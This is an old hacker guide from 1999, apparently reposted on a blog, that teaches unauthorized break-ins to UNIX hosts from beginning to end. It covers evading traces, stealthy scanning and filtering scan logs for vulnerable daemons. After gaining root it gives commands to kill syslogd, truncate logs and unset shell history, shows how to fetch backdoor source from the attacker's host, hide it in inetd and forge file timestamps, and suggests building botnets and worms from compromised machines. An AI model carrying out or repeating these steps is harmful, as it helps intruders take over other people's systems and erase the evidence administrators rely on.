(c) 1999 by Mixter
Disclaimer:
This is a theoretical instruction to cracking and for informational
purposes. It should be seen as an introduction to the methods and
strategies used by crackers rather than a howto. The author is not
suggesting to perform illegal actions and cannot be held liable
for any actions of other individuals who perform any of the actions
discussed in this paper and possible resulting damage.
Introduction:
I am going to describe the methods and strategies used to access
various UNIX hosts among the internet unauthorizedly. This guide will
not teach you how to hack, neither do you have to be a hacker to use
the techniques described here. Hacking means finding your own way
to do it, and finding new approaches to accomplishing something. I am
only going to supply you with one possible approach to cracking.
I. Prerequisites
Operating System:
You certainly need Unix installed on your home computer. WINDOWS
WILL NOT DO IT. I'm not going into details here, but you should take
either Net/Open/FreeBSD or Linux because they are POSIX compliant,
suitable for Home PC's and most small network tools will compile
on them. If you use Linux [1], you should not use the RedHat, SuSE, or
Slackware distributions unless you know how to secure them properly.
Local root compromise can be fatal as you may reveal your identity.
Basic Knowledge:
Get experienced in the use with the following tools. Use the 'man' command,
and work with them until you fully understand them. These tools are:
awk cat chmod dd grep gzip kill ln
ls mail mknod more mount ping ps sed
sort tar ifconfig ipfwadm last head tail
gcc cut find ftp less vim nc (netcat)
rcp xhost xterm syslogd inetd telnet ssh finger
Security requirements:
You need to make sure that no one can compromise your own host. Check
security sites to make sure your daemons (servers) are not exploitable.
Do not allow anyone to use your box. Disable telnet, rlogin, and whatever
you don't need yourself. Ideally, you do not run any servers at all while
you are attacking other hosts. Consider encrypting directories and/or
complete partitions with encrypted file systems and encrypt emails and
files you transfer with PGP. [2]
Account:
For your activities, you require an ISP account with a direct connection,
which normally all ISP provide. You might want to consider not doing
any 'cracking' activities from your home at all, in which case you need
a fast linux or bsd shell account, which must not be from a commercial
shell provider (esp. those who sell eggdrop and irc accounts), and if
you use a university account, you need to make sure that they do not
watch / monitor their users. If you use a dialup, ensure yourself that
no transparent proxies or network monitors (squid etc.) are being run by
your provider. Do a traceroute and check your providers backbone routers
for NIDS (Intrusion Detection), network monitors, proxies, and anything
that seems unusual; alternatively let someone with more knowledge do it.
II. Scanning
Avoiding track-downs:
Where you scan from is up yours. Whatever you do, don't scan from your
dialup while using a legit internet account. Everyone knowing your IP is
a phone call to your provider away from knowing your identity. If you
use fake accounts, avoid using fake or stolen credit cards to make them.
Also avoid using 1-800 numbers at all costs, because the 1-800 nodes
generally log every calling phone number with access time. Inquire about
the ISP you use to make sure he is not in explicit cooperation with federal
agencies. Additionally, do not stay longer than 5 (in words: five) hours
on the internet without hanging up and reconnecting. Why? If you are
logged on, the node has your account associated with your current
dynamic IP address for obvious technical reasons, and they also might
be able to trace you. Most nodes will not keep a table of which IP
belongs to which account once they disconnected, especially on huge
ISP where this would take large additional resources.
I disrecommend traversing through WinGate and SOCKS servers,
because they give you a fake feeling of safety. Often, these servers are
logging every access and sometimes they are put up by federal agencies
itself. You should ideally relay your connections through a server you
have root, hence full control, on, using datapipe, bnc, ssl, or a
wingate/socks server with logging completely disabled.
Stealthy scanning:
A scan not being noticed is a successful scan. Half-Open (SYN)
scans are lame, because many daemons will still report a
"warning: can't get client address: Connection reset by peer"
or similar message, then have someone turn on a sniffer or tcplogd
and they see who is scanning them. Advanced and recommended scans
are NUL (tcp packet without any flags), XMAS (ack/syn/rst probe),
and Maimon scans, which can be done with nmap [3]. If you use
connect() scans, which are much more reliable, then use lscan,
and get the version info. This generally makes the most sense
because you have to get the daemon's versions anyway to see
if it is exploitable.
Play dead:
As you scan, I strongly recommend disabling every single service
on the machine you're scanning from and setting packet filtering
rules. This will fool the hosts being scanned into thinking your
host is down and the scan is spoofed.
A few things you should disable:
* Inetd ( identd, finger, ftp, telnet )
* All INCOMING tcp connection requests (ipfwadm: -y flag)
* ICMP Timestamping, Echo reply, Query (ICMP types 8/13/15/17)
* UDP Traceroute queries (udp port range 33400-33500)
Also note that -deny is better than -reject, which would send
an ICMP unreach packet back instead of keeping totally silent.
Non-sequential scanning:
This is important: Use non-sequential scanning to avoid
intrusion detection systems. An IDS or NIDS is installed on a gateway
or router and monitors unusual traffic to certain ports. If you scan
1.1.1.1, 1.1.1.2 .. 1.1.1.255, 1.1.2.1 etc.,
an intrusion detection system can detect your scan against 1.1.1.*.
Instead, scan like this: 1.1.1.1, 1.1.2.1 .. 1.1.255.1, 1.1.1.2
You get the point.
What to scan:
Most crackers resolve a top-level domain like .com .net or a
country like .ee .se .ch etc. using z0ne or axfr from ADM [4], or
by using a simple recursive shell script. host -l domain will
not do for a scan, because you'll miss all the subnets that way,
and there are plenty of them.
However, I'd rather suggest scanning complete IP blocks. Depending
on your greed, you can either scan a class B (1.1.*.*) or class A
(1.*.*.*) network. You might wish to obtain some information about
your targets first. To do this, you can query whois.arin.net, the
registration center for IP addresses. Lets say you want to scan
192.168.*.* and you want to know who owns that IP block. Type:
whois -h whois.arin.net 192.168.0.0
or
whois 192.168.0.0@whois.arin.net
and you get a short description of the owners of that netblock.
If arin.net doesn't find any information, don't scan it, because
the IPs are probably not yet in use. Some info on the 'whois'
results...
Maintained by RIPE.NET = European (no, uk, ch, at, de, se, dk, etc.)
Maintained by APNIC.NET = Asian (id, kr, za, ee, tr, li, kh, etc.)
Maintained by NIC.xxx = Belonging to country xxx
Finding vulnerable hosts:
First rule of scanning is: never delete your scan logs. If
you think you are completely done with evaluating your logs,
then compress, encrypt and store them, dont delete them. New
security vulnerabilities will be found sooner or later, then you
won't have to scan it all again.
From my experience, the vulnerability scanners are almost all
bullshit, you dont need them. Use grep and awk to extract the
IP numbers from your scan logs, like this...
grep "QPOP" port110.log | grep "(version 2.2)" | awk '{print $1}' > 0wn.txt
(presuming that your scanner logs like this: "
There are a couple of cases where you need an additional scan
to find vulnerable versions, which are:
Buggy Daemon Scanner Scans for...
wu-ftp BETA-18 wuftpscan/ben (private) Writable dir
portmap rpcinfo -p (unix tool) Portmap Version
ttdbserver rpcinfo ttdb version
rstatd statdscan rstatd version
mountd mountdscan (rootshell) mountd/nfs version
bind binfo-udp (rootshell), bind version
nscan (my site),
mbind (private)
III. Rooting
Lets think about the first commands you issue. They should:
1. Discretely remove traces of the root compromise
2. Gather some general info about the system
3. Make sure you can get back in
4. Disable or patch the vulnerable daemon(s)
Here are my suggestions...
1. killall -9 syslogd klogd - pesky loggers! only few admins
will notice if they get turned off. Now you can act freely.
copy secure.1 and messages.1 from /var/log over secure and messages
Normally, these logs are the only ones with the intruders IP
and traces of a root compromise in them. If *.1 doesn't exist,
truncate the files. Also, unset HISTFILE is important.
Nobody does unset HISTFILE, thus leaving a .bash_history in
/var/named or even /. Very unprofessional :).
2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf...
Inform yourself about the frequency the system is being
maintained, administrated, if the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) - the
more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! you might want to
remove other backdoors.
* Look for a loghost or snmp (dangerous because you cant manipulate
the logs on a far-away loghost). Watch out for *logd, sniffers,
netmon's etc before you do anything great on the host.
If you are paranoid, traceroute the host, and see if non-routers
are before that host (probably IDS, loghost, sniffer, etc).
3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH!
It is too easy to detect you if you add yourself to /etc/passwd,
or open a port by manipulating inetd.conf. Let me tell you that
root kits and /bin/login trojans are the first things any sane admin
will watch for. Install a nice stealthy port backdoor. My approach
to uploading files is doing:
(on your box)
$ uuencode -m backdoor.c backdoor.c | less
(on the target box)
uudecode
# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on
port 666, that spits out the source code when someone telnets to
it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c
As I said, make sure you can get back in. If the box you rooted
has an uptime of more than 300 days or so, you might consider
not installing the backdoor for startup. Instead, kill the
vulnerable daemon, and when the host restarts, come back using an
exploit. Normally, you can replace a lame daemon that nobody uses
with your backdoor. Look at inetd.conf to see what daemons are
active. A safe bet is in.talkd which often is activated but seldom
ever used. So, when you want to re-activate your backdoor,
talk root@0wned.host.com for a second, and your backdoor is running.
You can also add /path/to/backdoor to /root/.profile.. but it is
a bit riskier than the inetd backdoor method.
4. Subscribe to bugtraq, CIAC security list, or look at rootshell,
to see what you need to do to patch your buggy stuff. If RPM is
installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm
If not, use ncftp to fetch the file anonymously, because it doesn't need
user interaction. If you want, add an additional backdoor in your
"patched" server. QPOP 2.53 even supports this itself.
For all files you replace, you should modify the time stamps,
which wont help, if the admin uses tripwire or cksum, but if the
admin is, like most admins, a complete lamer that does find / -ctime
to scan for trojans and thinks he knows his job. :P
To modify timestamps, you do a simple:
touch -r /bin/bash /path/to/your/trojan
this will copy the exact date/time info from /bin/bash
over your freshly added trojan. Voila!
The alternative to all this for lazy people is, to add a
ipfwadm rule that prevents traffic from the outside (-W eth0)
to the ports with the buggy daemons, and adding that command
to a rc.d script as well. Bind doesn't need tcp port 53 for anything
except zone transfers and the RoTShB/ADM bind exploits. It works
fine with 53/tcp firewalled. But be aware that this might get you
detected, lets say if you disable port 110 or 143 on an ISP's
central mail exchange server...
About your backdoor:
Port > 10000 is strongly recommended, also a backdoor using UDP,
ICMP, or even something as unusual as raw IP is very useful.
People that bind /bin/sh to a port are idiots, because they
open that host to everyone, letting in sniffers, and probably
other people who may damage the host seriously. Make sure to
password protect everything that runs as root. A password
of a minimum length of 8 characters, because you have no way
of detecting a brute force attack. For the C programmers, let
me say, listen(sockfd,1). Maybe 2 connections, but not more.
For comfortability, you can add some stuff you want to occur
on each successful backdoor login, like system("w"),
system("killall -9 syslogd klogd"), or whatever. If you want a
front-end backdoor with some integrated functions, try gateway[5].
IV. UTILIZING COMPROMISED SYSTEMS
About your activities:
Do what you desire, but never without disregarding stealthiness.
If you stop checking log files, processes, or start something
like ping -s 1024 -f cert.org un-stealthed, it is, depending
on the admin, a matter of hours or days until you lose the host.
Most of the time, losing a host means you cannot get access again,
and the admins will examine their system with extreme scrutiny;
if they are too lame, they might contact some external security
experts or even the Computer Emergency Response Team.
Never do serious damage to the system, when you don't have to -
and trust me, you won't. Damaging a system by altering vital system
files, replacing frequently-used programs or even destroying
information is unintelligent, will not do you any good, and will
maybe assist you in getting new enemies.
And it is trivial to mention not to deface web sites...
World domination:
As the number of systems you control increases, you might want
some kind of easy remote control, utilization for attacks,
and detection of detection of your activities. You can install
newnick bots or eggdrop bots with fancy scripts which can be
controlled through IRC to make life easier (make sure to sit and
think before you consider doing anything big with them on IRC!).
You can make your own inter-linked network of root systems,
in which case you need to start programming because no one will
release such a program to the public. :)
You can make a little packages with spoofing flooders, smurf
and the like, if you decide becoming a packet warrior (then again,
it won't help you accomplishing anything but getting irc channels
or shutting down government sites...).
Alternatively, you can use every root you get to scan new netblocks,
and have the information mailed to you or whatever. You can make
an internet worm like ADMw0rm [4], B4b0w0rm, millennium worm
(the last 2 are private), and install them on your roots; make sure
it is well constructed and bug-free...
If you are a creative person, you can make them scan large amounts
of ISP dialup netblocks for back orifice, netbus server, backdoor G,
and what not, and write something that controls their computers
to spread more trojans, send their mail to you, get their
passwords, flood, scan, invade their private lives...
no wait, that's the governments job.
V. YOUR PRESENCE ON THE NET
Smart behavior and senseless behavior:
What you do besides cracking, mostly happens on IRC. IRC
should be seen as a tool for getting in touch with other
skilled persons and exchanging thoughts and information.
To avoid wasting your time, skills, and possibly getting
busted, here are some things which you SERIOUSLY should
not be doing:
1) Warez. Stay away from warez, it is a waste of time.
Warez ruins productive people and makes software expensive.
Besides the moral bullshit, you can always get something
you really need (#1 net game, enterprise application etc.),
and you don't need much, trust me. Almost everything
security / hacking related is free. Joining a warez group
gets you a) alot of vhosts with lame names b) idiotic
friends c) on the FBI blacklist - nothing besides that.
2) 'IRC War'. Groups like core, chrome, enforce, conflict,
takeover, madcrew, phorce, tnt, etc. etc. who call themselves
'War' groups, are good for nothing. Why would you want to
be a member of a group that attacks other similar groups
and channels - it is comparable to the mafia - almost
as violent, dangerous, except that you don't get rich.
If you think you need 'WarGroup' support for taking a
channel with reasonable security, you are lame or you
can't take a challenge. Think again.
3) Hacking related groups. Inform yourself about what
happened to gH or 'global Hell'. Most of these groups
do the exact opposite of what is advised in this paper.
If you get an offer to join:
l0pht, cDc, MOD, thc, or ADM, take it because you'll
learn a lot, all other groups are not worth your time.
4) IRC operators, BOFH, admin of big systems. Stay away
from them until you are confidently prepared and willing
to fight with them. Blindly attacking them can also be a waste
of time, but it can also become a reasonable challenge.
Keep up to date:
The more you advance in cracking skills, or even might
consider hacking, programming or developing, the web
probably gets the part of the web you use least.
Visit your favorite security related sites frequently,
and make sure to keep up to date about security breaches,
law enforcement, exploits, changes in the methods of
crackers and admins. My bookmarks certainly include
Packetstorm security [6] and GeekGirl [7].
URLS:
[1] ftp://ftp.cdrom.com/pub/linux/distributions
[2] http://members.xoom.com/i0wnu/pgp.html
[3] http://www.nmap.org
[4] ftp://ftp.adm.isp.at/pub/ADM
[5] http://members.xoom.com/i0wnu/gateway.tgz
[6] http://www.genocide2600.com/~tattooman
[7] http://www.geek-girl.com
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBN2VcO7dkBvUb0vPhAQGtPgf+Iglo6ZZh7sF/WbeteyTGYaw0D9AJR4IH
A7hBo9AUwm3ZO7gDhdzLvDlOjXiMxhhJ2Jey/Y6M5Bb5LvZf8tK4EoUIF/UA8ifU
E6fd18zBDJep2LFaHyzXegA5oCWCYjpb3ZcFtbtpcA2He1hU85QUknOAHZ6lJyiV
JJZziWnXRkAcmRpzbLkTgVydisgugNwfYs9OJH/GNMCKQzeKB+MJrQ7wNlNOdV6T
7u4Jt1q1hW7P5p3xi6ETS196qQ7NO+46FqTEShk6HC+wl7EDwv8VTbz5lEGjBVXz
JEiIIAM5YfbGRbu65fTIlhI0u5N8OxKkX74HOGcBsInQlzuCNq6aMA==
=o8mY
No comments:
Post a Comment